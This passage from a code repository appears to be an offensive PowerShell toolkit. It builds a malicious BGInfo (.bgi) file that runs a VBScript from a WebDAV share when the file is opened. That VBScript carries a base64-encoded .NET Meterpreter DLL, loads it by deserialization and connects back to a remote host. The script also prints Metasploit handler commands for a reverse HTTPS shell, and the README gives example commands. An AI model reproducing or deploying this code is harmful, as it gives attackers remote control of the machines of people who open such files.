"cnByZXRlckRMTAAABQEAAAAAFwEAEkNvcHlyaWdodCDCqSAgMjAxNwAAKQEAJDJjNTFkN2MwLTQy" 353 | s = s & "YTAtNDZhYS04ODU3LTg4NzVkMGE4OTk0MQAADAEABzEuMC4wLjAAAAUBAAEAAAQBAAAAAAAAAAAA" 354 | s = s & "ADMkWQAAAAACAAAAHAEAALQ0AAC0FgAAUlNEU5rqaWIyYnlFqU0KlwuW22IBAAAAQzpcRGV2ZWxv" 355 | s = s & "cG1lbnRcQ1NoYXJwLVdlYi1NZXRlcnByZXRlckRMTFxDU2hhcnAtV2ViLU1ldGVycHJldGVyRExM" 356 | s = s & "XG9ialxSZWxlYXNlXENTaGFycC1XZWItTWV0ZXJwcmV0ZXJETEwucGRiAAAAAAAAAAAAAAAAAAAA" 357 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 358 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 359 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD4NQAAAAAAAAAAAAASNgAAACAAAAAAAAAAAAAAAAAAAAAA" 360 | s = s & "AAAAAAAABDYAAAAAAAAAAAAAAABfQ29yRGxsTWFpbgBtc2NvcmVlLmRsbAAAAAAA/yUAIAAQAAAA" 361 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 362 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 363 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 364 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 365 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 366 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 367 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 368 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 369 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQABAAAA" 370 | s = s & "MAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAACcAwAAAAAAAAAAAACcAzQAAABWAFMAXwBW" 371 | s = s & "AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAEAAAAAAAAAAQAAAAAAPwAAAAAA" 372 | s = s & "AAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAAAAAAJAAE" 373 | s = s & "AAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE/AIAAAEAUwB0AHIAaQBuAGcARgBpAGwA" 374 | s = s & "ZQBJAG4AZgBvAAAA2AIAAAEAMAAwADAAMAAwADQAYgAwAAAAGgABAAEAQwBvAG0AbQBlAG4AdABz" 375 | s = s & "AAAAAAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAAAAAAAAAAAFwAGgABAEYAaQBsAGUA" 376 | s = s & "RABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAFMAaABhAHIAcAAtAFcAZQBiAC0ATQBlAHQAZQBy" 377 | s = s & "AHAAcgBlAHQAZQByAEQATABMAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAxAC4A" 378 | s = s & "MAAuADAALgAwAAAAXAAeAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABDAFMAaABhAHIAcAAt" 379 | s = s & "AFcAZQBiAC0ATQBlAHQAZQByAHAAcgBlAHQAZQByAEQATABMAC4AZABsAGwAAABIABIAAQBMAGUA" 380 | s = s & "ZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAgADIAMAAx" 381 | s = s & "ADcAAAAqAAEAAQBMAGUAZwBhAGwAVAByAGEAZABlAG0AYQByAGsAcwAAAAAAAAAAAGQAHgABAE8A" 382 | s = s & "cgBpAGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABDAFMAaABhAHIAcAAtAFcAZQBiAC0ATQBl" 383 | s = s & "AHQAZQByAHAAcgBlAHQAZQByAEQATABMAC4AZABsAGwAAABUABoAAQBQAHIAbwBkAHUAYwB0AE4A" 384 | s = s & "YQBtAGUAAAAAAEMAUwBoAGEAcgBwAC0AVwBlAGIALQBNAGUAdABlAHIAcAByAGUAdABlAHIARABM" 385 | s = s & "AEwAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAA" 386 | s = s & "OAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAA" 387 | s = s & "AAAAAAAAAAAAAAAAMAAADAAAACQ2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 388 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 389 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 390 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 391 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 392 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 393 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 394 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 395 | s = s & "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 396 | s = s & "AAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZsZWN0aW9u" 397 | s = s & "LkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA" 398 | entry_class = "MeterPreter" 399 | 400 | Dim fmt, al, d, o 401 | Set fmt = CreateObject("System.Runtime.Serialization.Formatters.Binary.BinaryFormatter") 402 | Set al = CreateObject("System.Collections.ArrayList") 403 | al.Add fmt.SurrogateSelector 404 | 405 | Set d = fmt.Deserialize_2(Base64ToStream(s)) 406 | Set o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class) 407 | o.MSFConnect RHOST, RPORT, UseHTTPS 408 | End Sub 409 | 410 | SetVersion 411 | On Error Resume Next 412 | Run 413 | If Err.Number <> 0 Then 414 | Debug Err.Description 415 | Err.Clear 416 | End If 417 | "@ 418 | 419 | #Verify and create outfilepath if it is missing 420 | if(!(test-path $OutFilePath)) 421 | { 422 | New-Item -path $OutFilePath -type Directory 423 | } 424 | 425 | Write-Output "Remember to start your handler on metasploit 426 | msfconsole 427 | use exploit/multi/handler 428 | set PAYLOAD windows/meterpreter/reverse_https 429 | set LHOST 0.0.0.0 430 | set LPORT 443 431 | set AutoRunScript post/windows/manage/migrate NAME=notepad.exe 432 | set EnableUnicodeEncoding true 433 | set EnableStageEncoding true 434 | set ExitOnSession false 435 | exploit -j" 436 | 437 | $Code | Out-File "$OutFilepath\$OutFile" -Encoding ascii 438 | } 439 | End 440 | { 441 | } 442 | } 443 | 444 | ## Example ## 445 | # New-BGIFile -FileName "MyEvilBgi.bgi" -Script "\\10.10.10.10\webdav\VBSMeterShell.vbs" -OutFilePath "C:\BGIPayload" 446 | # New-VBSWebMeter -RHOST "10.10.10.10" -RPORT "443" -HTTPS "Yes" -OutFilePath "C:\BGIPayload" -OutFile "VBSMeterShell.vbs" -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # BGInfo 2 | 2 Functions used to create a .BGI file executing script. 3 | Thanks to Cn33liz - @Cneelis for VBSWebMeter. 4 | 5 | How to use the functions: 6 | 7 | ## Example ## 8 | This example will generate a file called MyEvilBgi.bgi and VBSMeterShell.vbs inside the c:\BGIPayload folder. The BGI file will try to execute \\10.10.10.10\webdav\VBSMeterShell.vbs when opened. 9 | 10 | New-BGIFile -FileName "MyEvilBgi.bgi" -Script "\\10.10.10.10\webdav\VBSMeterShell.vbs" -OutFilePath "C:\BGIPayload" 11 | 12 | New-VBSWebMeter -RHOST "10.10.10.10" -RPORT "443" -HTTPS "Yes" -OutFilePath "C:\BGIPayload" -OutFile "VBSMeterShell.vbs" 13 | --------------------------------------------------------------------------------